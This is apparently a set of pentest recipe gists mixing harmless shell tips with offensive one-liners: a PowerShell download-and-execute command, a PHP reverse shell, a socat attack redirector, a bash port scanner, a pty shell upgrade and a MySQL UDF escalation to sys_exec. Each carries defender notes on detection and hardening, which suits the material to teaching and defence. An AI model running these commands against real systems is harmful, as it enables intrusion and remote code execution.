p0c / sleep_until.sh
Last active February 2, 2016 18:49
shell function sleep until
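# Sleep until the point in time described by the arguments.
# Arguments: all arguments are joined and handed to `date -d` (GNU date
#            syntax), e.g. "tomorrow 11:50" or "24 hours".
# Outputs:   diagnostics on stderr when the time cannot be used.
# Returns:   the exit status of sleep on success; 1 when no time was given,
#            the time cannot be parsed, or the target is already in the past.
sleep_until() {
  # Keep the working variables out of the caller's shell.
  local current_time target_time seconds

  if [ "$#" -eq 0 ]; then
    printf 'usage: sleep_until <time understood by date -d>\n' >&2
    return 1
  fi

  current_time=$(date +%s) || return 1

  # A failed parse would otherwise leave target_time empty and turn the
  # subtraction below into a large negative number.
  if ! target_time=$(date -d "$*" +%s); then
    printf 'sleep_until: cannot parse time: %s\n' "$*" >&2
    return 1
  fi

  seconds=$(( target_time - current_time ))

  # A bare clock time such as "11:50" resolves to today; once that moment has
  # passed the difference is negative and sleep would reject it.
  if [ "$seconds" -lt 0 ]; then
    printf 'sleep_until: target time is in the past: %s\n' "$*" >&2
    return 1
  fi

  sleep "$seconds"
}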
# Usage:
# sleep_until tomorrow 11:50
# sleep_until 24 hours
p0c / download_exec_bypass_execp
Created February 16, 2015 09:40
download and exec bypassing powershell execution policy
# -nop is -NoProfile and -c is -Command. The text fetched by DownloadString is
# handed to iex (Invoke-Expression) as a string, so no script file is loaded
# from disk; the execution policy governs script files and is not consulted.
# Execution policy is therefore not a control against this pattern.
# Defender view: with Script Block Logging enabled the evaluated content is
# recorded as event 4104 in the PowerShell operational log, process-creation
# auditing with command-line capture shows the DownloadString/iex pair, and on
# AMSI-enabled hosts the downloaded string is submitted to the antimalware
# provider before it runs.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://your_host/your_script.ps1')"
p0c / socat_redirect
Created October 3, 2014 08:55
#pentest #recipe: socat port redirector
# socat tcp port redirector, useful for cloud based redirectors (distributed attack network simulation)
# TCP-LISTEN:80,fork accepts connections on local port 80 and forks one child
# per connection; each child relays the byte stream to 10.10.0.1 port 80.
# Defender view: the destination host logs the redirector's address as the
# peer, not the original client, so attributing traffic needs connection logs
# from the redirector itself or flow data from the network in between.
socat TCP-LISTEN:80,fork TCP:10.10.0.1:80
p0c / script_strip
Created June 26, 2014 11:16
#pentest #recipe: clean escape sequence codes from 'script' log
#!/bin/bash
#-----------------------------------------------------------------------------
# Preconditions:
#
# You have a `script` command outputfile (typescript by default)
#
# $ script
# Script started, file is typescript
# <-- your commands and output here -->
p0c / php_small_reverseshell
Created February 17, 2014 09:49
#pentest #recipe: small php reverse shell
# The shell's stdin, stdout and stderr are redirected to file descriptor 3.
# That is the socket only when fsockopen() received descriptor 3; the number
# can differ when the PHP process already holds other open files.
# Defender view: the observable behaviour is a PHP process (typically the web
# server worker) spawning sh while holding an outbound TCP connection.
# Restricting exec and fsockopen through the php.ini disable_functions
# directive and filtering egress from web servers both break this pattern.
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
# command line version: the same statements passed to the php CLI with -r
php -r '$s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");'
p0c / speed_up_ssh-Y
Created February 11, 2014 10:21
speed up ssh x-forward
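# -Y enables trusted X11 forwarding: X clients on the remote host get
# unrestricted access to the local display, including keystrokes and window
# contents. -X applies the X11 SECURITY extension restrictions instead, for
# applications that tolerate them.
# -C turns on compression, -4 forces IPv4.
# The arcfour and blowfish-cbc ciphers were removed from OpenSSH in release
# 7.6, so current clients reject them. aes128-gcm@openssh.com is authenticated
# and hardware-accelerated on most CPUs; aes128-ctr is the fallback for
# servers that do not offer GCM.
ssh -YC4 -c aes128-gcm@openssh.com,aes128-ctr user@host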
p0c / bash_portscanner
Created February 4, 2014 19:52
#pentest #recipe: bash commandline portscanner
# Walks TCP ports 1 through 65535 on $HOST. For each port it pipes an
# "open $HOST $port" command into telnet, discards telnet's stderr, and greps
# stdout for 'Connected to'; a match is reported as an open port. The current
# port number is printed before each probe as a progress indicator.
# Defender view: every probe is a full TCP connect issued one port at a time
# from a single source, so it appears in firewall and connection logs as a
# sequential sweep across the whole port range.
HOST=192.168.100.254;for((port=1;port<=65535;++port));do echo -en "$port ";if echo -en "open $HOST $port\nlogout\quit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null;then echo -en "\n\nport $port/tcp is open\n\n";fi;done
p0c / upgrade_to_proper_shell
Created February 4, 2014 10:51
#pentest #recipe: upgrade to proper shell
# pty.spawn() starts /bin/bash attached to a newly allocated pseudo-terminal,
# so programs that insist on a tty (password prompts, job control, full-screen
# tools) work inside a session that had none.
# Defender view: the process tree shows python as the parent of bash with a
# pty allocated, which stands out under service accounts that never open an
# interactive session.
$ python -c 'import pty;pty.spawn("/bin/bash")'
p0c / mysql_root_to_system_root
Last active August 14, 2021 23:58
#pentest #recipe: mysql root -> system root (linux)
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
#
# What the statements do: the shared object is read from /tmp with load_file()
# into a blob column, written back out with INTO DUMPFILE under /usr/lib, and
# registered as the user-defined function sys_exec, which is then called.
#
# Conditions this depends on, each of which is a hardening point:
#   - load_file() and INTO DUMPFILE need the FILE privilege and are confined
#     by the secure_file_priv system variable when it is set.
#   - the OS account running mysqld must be able to write to the target
#     library directory; current MySQL versions load UDF libraries only from
#     plugin_dir.
#   - sys_exec runs commands as the OS account of the mysqld process, so the
#     result is system root only where mysqld itself runs as root.
# Defender view: run mysqld as an unprivileged account, set secure_file_priv,
# keep the plugin directory unwritable by that account, and review the
# mysql.func table and CREATE FUNCTION ... SONAME statements in audit logs.
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
p0c / vim-ignore-esc-seq
Created January 8, 2014 16:03
Ignore escape sequences in VIM: Useful for editing / viewing script command output
Use AnsiEsc.vim (https://github.com/vim-scripts/AnsiEsc.vim)
When editing a file with escape sequences (for example output of script command) --> :AnsiEsc